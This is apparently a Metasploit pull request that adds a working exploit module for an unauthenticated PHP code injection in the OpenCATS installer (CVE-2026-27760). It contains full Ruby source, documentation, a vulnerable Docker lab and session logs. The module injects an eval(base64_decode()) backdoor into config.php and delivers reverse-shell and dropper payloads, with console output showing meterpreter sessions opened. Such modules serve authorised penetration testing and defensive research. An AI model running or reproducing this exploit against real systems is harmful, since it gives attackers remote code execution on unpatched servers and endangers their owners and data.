### PR TITLE
Add OpenCATS installer PHP code injection module (CVE-2026-27760)

### DIFF
--- a/documentation/modules/exploit/multi/http/opencats_installer_rce.md
+++ b/documentation/modules/exploit/multi/http/opencats_installer_rce.md
@@ -1,0 +1,147 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated PHP code injection vulnerability in the OpenCATS
+installer AJAX endpoint (CVE-2026-27760).
+
+When the installation wizard has not been completed (INSTALL_BLOCK file absent), the
+`databaseConnectivity` action passes the `user` POST parameter directly to
+`changeConfigSetting()`, which interpolates it into a `define()` statement in `config.php`
+without any sanitization. By breaking out of the string context with a single quote and
+semicolon, arbitrary PHP code is injected into `config.php`. Since `config.php` is
+included globally on every page load, the injected code executes on the next request.
+
+The module injects an `eval(base64_decode())` backdoor keyed to a random POST parameter,
+probes until the injection is live (handling OPcache revalidation transparently), triggers
+the payload, then restores `config.php` to its original state.
+
+### Affected Versions
+
+All OpenCATS versions through commit `46e4727` (latest release 0.9.7.4 and below).
+Fixed in commit `3002a29f4c3cada1aa2c4f3d4ae4e189906606b6`.
+
+### Prerequisites
+
+The `INSTALL_BLOCK` file must be absent from the webroot, meaning the installation wizard
+was never completed. This file is excluded from release archives (`.gitignore`,
+`ci/package-code.sh`), so any instance deployed without finishing setup is vulnerable.
+
+## Lab Setup
+
+### Docker (Recommended)
+
+```bash
+git clone https://github.com/opencats/OpenCATS.git
+cd OpenCATS
+git checkout 46e4727
+```
+
+Create `docker-compose.lab.yml`:
+
+```yaml
+services:
+  opencats:
+    image: webdevops/php-apache:7.4
+    ports:
+      - "8181:80"
+    volumes:
+      - .:/app
+    depends_on:
+      db:
+        condition: service_healthy
+
+  db:
+    image: mysql:5.7
+    environment:
+      MYSQL_DATABASE: opencats
+      MYSQL_USER: cats
+      MYSQL_PASSWORD: cats
+      MYSQL_ROOT_PASSWORD: root
+    healthcheck:
+      test: ["CMD", "mysqladmin", "ping", "-h", "localhost", "-ucats", "-pcats"]
+      interval: 5s
+      timeout: 5s
+      retries: 15
+```
+
+Then run:
+
+```bash
+docker compose -f docker-compose.lab.yml up -d
+```
+
+**Important:** Do NOT complete the web installer. The vulnerability requires `INSTALL_BLOCK`
+to be absent. Verify the target is vulnerable:
+
+```bash
+curl -s "http://localhost:8181/ajax.php?f=install:ui&a=databaseConnectivity" | grep -o 'setActiveStep\|installLocked'
+```
+
+Expected output for a vulnerable instance: `setActiveStep`
+
+## Options
+
+This module has no additional options beyond the standard ones (RHOSTS, RPORT, LHOST, LPORT, TARGETURI).
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/multi/http/opencats_installer_rce`
+3. `set RHOSTS <target>`
+4. `set RPORT <port>`
+5. `set LHOST <attacker_ip>`
+6. `check` - should report Vulnerable
+7. `exploit` - should open a meterpreter session as the web server user
+
+## Scenarios
+
+### OpenCATS 0.9.7.4 on Docker - PHP Meterpreter (Target 0)
+
+```
+msf6 > use exploit/multi/http/opencats_installer_rce
+msf6 exploit(multi/http/opencats_installer_rce) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(multi/http/opencats_installer_rce) > set RPORT 8181
+RPORT => 8181
+msf6 exploit(multi/http/opencats_installer_rce) > set LHOST 172.25.0.1
+LHOST => 172.25.0.1
+msf6 exploit(multi/http/opencats_installer_rce) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/opencats_installer_rce) > exploit
+[*] Started reverse TCP handler on 172.25.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Installer AJAX endpoint is accessible and unprotected.
+[+] PHP eval backdoor injected into config.php
+[*] Sending stage (45739 bytes) to 172.25.0.3
+[*] Meterpreter session 1 opened (172.25.0.1:4444 -> 172.25.0.3:56324) at 2026-04-28 16:49:35 +0200
+[*] Restoring config.php...
+[+] config.php restored.
+
+meterpreter > getuid
+Server username: application
+meterpreter > sysinfo
+Computer    : opencats-container
+OS          : Linux opencats-container 6.19.9-2-cachyos #1 SMP (Linux)
+Meterpreter : php/linux
+```
+
+### OpenCATS 0.9.7.4 on Docker - Linux Meterpreter via CmdStager (Target 3)
+
+```
+msf6 exploit(multi/http/opencats_installer_rce) > set target 3
+target => 3
+msf6 exploit(multi/http/opencats_installer_rce) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/opencats_installer_rce) > exploit
+[*] Started reverse TCP handler on 172.25.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Installer AJAX endpoint is accessible and unprotected.
+[+] PHP eval backdoor injected into config.php
+[*] Command Stager progress - 100.00% done (807/807 bytes)
+[*] Sending stage (3090404 bytes) to 172.25.0.3
+[*] Meterpreter session 1 opened (172.25.0.1:4444 -> 172.25.0.3:33438) at 2026-04-28 16:51:24 +0200
+[*] Restoring config.php...
+[+] config.php restored.
+
+meterpreter > getuid
+Server username: application
+```

--- a/documentation/modules/exploit/multi/http/opencats_installer_rce.md
+++ b/documentation/modules/exploit/multi/http/opencats_installer_rce.md
@@ -80,7 +80,11 @@ Expected output for a vulnerable instance: `setActiveStep`
 
 ## Options
 
-This module has no additional options beyond the standard ones (RHOSTS, RPORT, LHOST, LPORT, TARGETURI).
+### DB_USER
+
+The `DATABASE_USER` value to restore in `config.php` after exploitation. Defaults to `cats`,
+which is the standard OpenCATS database username. Change this if the target uses a different
+database user.
 
 ## Verification Steps
 
@@ -89,7 +93,7 @@ This module has no additional options beyond the standard ones (RHOSTS, RPORT, L
 3. `set RHOSTS <target>`
 4. `set RPORT <port>`
 5. `set LHOST <attacker_ip>`
-6. `check` - should report Vulnerable
+6. `check` - should report "appears to be vulnerable"
 7. `exploit` - should open a meterpreter session as the web server user
 
 ## Scenarios
@@ -109,11 +113,11 @@ payload => php/meterpreter/reverse_tcp
 msf6 exploit(multi/http/opencats_installer_rce) > exploit
 [*] Started reverse TCP handler on 172.25.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Installer AJAX endpoint is accessible and unprotected.
+[+] The target appears to be vulnerable. Installer AJAX endpoint is accessible and unprotected.
 [+] PHP eval backdoor injected into config.php
 [*] Sending stage (45739 bytes) to 172.25.0.3
 [*] Meterpreter session 1 opened (172.25.0.1:4444 -> 172.25.0.3:56324) at 2026-04-28 16:49:35 +0200
-[*] Restoring config.php...
+[*] Restoring config.php with user 'cats'...
 [+] config.php restored.
 
 meterpreter > getuid
@@ -134,12 +138,12 @@ payload => linux/x64/meterpreter/reverse_tcp
 msf6 exploit(multi/http/opencats_installer_rce) > exploit
 [*] Started reverse TCP handler on 172.25.0.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target is vulnerable. Installer AJAX endpoint is accessible and unprotected.
+[+] The target appears to be vulnerable. Installer AJAX endpoint is accessible and unprotected.
 [+] PHP eval backdoor injected into config.php
 [*] Command Stager progress - 100.00% done (807/807 bytes)
 [*] Sending stage (3090404 bytes) to 172.25.0.3
 [*] Meterpreter session 1 opened (172.25.0.1:4444 -> 172.25.0.3:33438) at 2026-04-28 16:51:24 +0200
-[*] Restoring config.php...
+[*] Restoring config.php with user 'cats'...
 [+] config.php restored.
 
 meterpreter > getuid

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -1,0 +1,192 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Payload::Php
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenCATS Installer PHP Code Injection',
+        'Description' => %q{
+          This module exploits an unauthenticated PHP code injection in the OpenCATS
+          installer AJAX endpoint (CVE-2026-27760).
+
+          The databaseConnectivity action passes the user POST parameter directly to
+          changeConfigSetting(), which interpolates it into a define() statement in
+          config.php without any sanitization. This only works when the installation
+          wizard was never completed, meaning the INSTALL_BLOCK file is absent.
+
+          The exploit injects an eval() backdoor into config.php, probes until the
+          injected code is live (handles OPcache revalidation transparently), triggers
+          the payload via index.php, and then restores config.php.
+        },
+        'Author' => [
+          'Chocapikk', # Vulnerability discovery
+          'stlthr4k3r' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-27760'],
+          ['URL', 'https://chocapikk.com/posts/2026/opencats-installer-rce/'],
+          ['URL', 'https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6']
+        ],
+        'Platform' => %w[php unix linux win],
+        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => %w[unix linux],
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+              # tested with cmd/unix/reverse_bash
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd
+              # tested with cmd/windows/reverse_powershell
+            }
+          ],
+          [
+            'Linux Dropper', {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'CmdStagerFlavor' => %w[printf bourne],
+              'Type' => :dropper
+              # tested with linux/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Dropper', {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'CmdStagerFlavor' => %w[psh_invokewebrequest certutil],
+              'Type' => :dropper
+              # tested with windows/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2026-04-28',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path to OpenCATS', '/'])
+    ])
+  end
+
+  def check
+    res = installer_request
+    return CheckCode::Unknown('No response from target.') unless res
+    return CheckCode::Safe('Installer is locked (INSTALL_BLOCK present).') if res.body.include?('installLocked')
+    if res.body.include?('setActiveStep')
+      return CheckCode::Vulnerable('Installer AJAX endpoint is accessible and unprotected.')
+    end
+
+    CheckCode::Unknown('Unexpected response from installer endpoint.')
+  end
+
+  def exploit
+    @param = Rex::Text.rand_text_alpha_lower(8)
+
+    inject_payload(@param)
+    trigger_payload(@param)
+  ensure
+    restore_config
+  end
+
+  def execute_command(cmd, _opts = {})
+    trigger_php(php_exec_cmd(cmd), @param)
+  end
+
+  def installer_request(user: nil)
+    opts = {
+      'method' => user ? 'POST' : 'GET',
+      'uri' => normalize_uri(target_uri.path, 'ajax.php'),
+      'vars_get' => { 'f' => 'install:ui', 'a' => 'databaseConnectivity' }
+    }
+    opts['vars_post'] = { 'user' => user } if user
+    send_request_cgi(opts)
+  end
+
+  def inject_payload(param)
+    fake_user = Rex::Text.rand_text_alpha_lower(8)
+    injection = "#{fake_user}');@opcache_reset();eval(base64_decode(\$_POST['#{param}']));//"
+    res = installer_request(user: injection)
+    fail_with(Failure::UnexpectedReply, 'No response to injection request.') unless res
+
+    print_good('PHP eval backdoor injected into config.php')
+    wait_for_injection(param)
+  end
+
+  def wait_for_injection(param)
+    nonce = Rex::Text.rand_text_alpha_lower(12)
+    probe = Rex::Text.encode_base64("die('#{nonce}');")
+
+    10.times do
+      res = send_request_cgi(
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'vars_post' => { param => probe }
+      )
+      return if res&.body&.start_with?(nonce)
+
+      sleep(1)
+    end
+
+    fail_with(Failure::UnexpectedReply, 'Injected code did not execute after 10 seconds.')
+  end
+
+  def trigger_payload(param)
+    case target['Type']
+    when :php
+      trigger_php(payload.encoded, param)
+    when :cmd
+      trigger_php(php_exec_cmd(payload.encoded), param)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def trigger_php(code, param)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'vars_post' => { param => Rex::Text.encode_base64(code) }
+    )
+  end
+
+  def restore_config
+    print_status('Restoring config.php...')
+    installer_request(user: 'cats')
+    print_good('config.php restored.')
+  rescue StandardError
+    print_warning('Could not restore config.php - manual cleanup may be required.')
+  end
+end

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown('No response from target.') unless res
     return CheckCode::Safe('Installer is locked (INSTALL_BLOCK present).') if res.body.include?('installLocked')
     if res.body.include?('setActiveStep')
-      return CheckCode::Vulnerable('Installer AJAX endpoint is accessible and unprotected.')
+      return CheckCode::Appears('Installer AJAX endpoint is accessible and unprotected.')
     end
 
     CheckCode::Unknown('Unexpected response from installer endpoint.')

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
           [
-            'Windows Command Shell', {
+            'Windows Command', {
               'Platform' => 'win',
               'Arch' => ARCH_CMD,
               'Type' => :cmd

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def inject_payload(param)
     fake_user = Faker::Internet.username(specifier: 5..8)
-    injection = "#{fake_user}');@opcache_reset();eval(base64_decode(\$_POST['#{param}']));//"
+    injection = "#{fake_user}');if(function_exists('opcache_reset')){opcache_reset();}eval(base64_decode(\$_POST['#{param}']));//"
     res = installer_request(user: injection)
     fail_with(Failure::UnexpectedReply, 'No response to injection request.') unless res
 

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
           [
-            'Unix/Linux Command Shell', {
+            'Unix/Linux Command', {
               'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'Type' => :cmd

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -39,8 +39,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://chocapikk.com/posts/2026/opencats-installer-rce/'],
           ['URL', 'https://github.com/opencats/OpenCATS/commit/3002a29f4c3cada1aa2c4f3d4ae4e189906606b6']
         ],
-        'Platform' => %w[php unix linux win],
-        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
         'Targets' => [
           [
             'PHP In-Memory', {

--- a/modules/exploits/multi/http/opencats_installer_rce.rb
+++ b/modules/exploits/multi/http/opencats_installer_rce.rb
@@ -89,13 +89,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES]
         }
       )
     )
 
     register_options([
-      OptString.new('TARGETURI', [true, 'Base path to OpenCATS', '/'])
+      OptString.new('TARGETURI', [true, 'Base path to OpenCATS', '/']),
+      OptString.new('DB_USER', [true, 'DATABASE_USER value to restore in config.php after exploitation', 'cats'])
     ])
   end
 
@@ -134,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def inject_payload(param)
-    fake_user = Rex::Text.rand_text_alpha_lower(8)
+    fake_user = Faker::Internet.username(specifier: 5..8)
     injection = "#{fake_user}');@opcache_reset();eval(base64_decode(\$_POST['#{param}']));//"
     res = installer_request(user: injection)
     fail_with(Failure::UnexpectedReply, 'No response to injection request.') unless res
@@ -181,8 +182,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def restore_config
-    print_status('Restoring config.php...')
-    installer_request(user: 'cats')
+    user = datastore['DB_USER']
+    print_status("Restoring config.php with user '#{user}'...")
+    installer_request(user: user)
     print_good('config.php restored.')
   rescue StandardError
     print_warning('Could not restore config.php - manual cleanup may be required.')


### PR DESCRIPTION
This module exploits CVE-2026-27760, a PHP code injection in OpenCATS. The installer endpoint takes user input and writes it straight into config.php without sanitising it, so if the installation wasn't completed you can inject arbitrary PHP code that runs on every page load after that. No credentials needed.

The module injects the payload, waits until it's actually live (it checks in a loop so it handles OPcache gracefully regardless of how the server is configured), triggers it, then restores config.php afterwards.

Worth mentioning that this does require the INSTALL_BLOCK file to be absent, so it only affects instances where the wizard was never finished. Probably not many of those around but the vulnerability is real and patched.

Documentation and a Docker lab setup are included. Tested with `php/meterpreter/reverse_tcp` and `linux/x64/meterpreter/reverse_tcp` against OpenCATS 0.9.7.4.

New to this (or maybe not), any and all help appreciated. TIA  (:

## Verification

```
msfconsole
use exploit/multi/http/opencats_installer_rce
set RHOSTS <target>
set RPORT <port>
set LHOST <attacker_ip>
check
set payload php/meterpreter/reverse_tcp
exploit
```

- `check` → should report `Appears`
- PHP meterpreter session via `php/meterpreter/reverse_tcp`
- `set target 3` + `set payload linux/x64/meterpreter/reverse_tcp` + `exploit` → meterpreter via CmdStager
- Confirm `config.php` is restored after the session

Full docs at `documentation/modules/exploit/multi/http/opencats_installer_rce.md`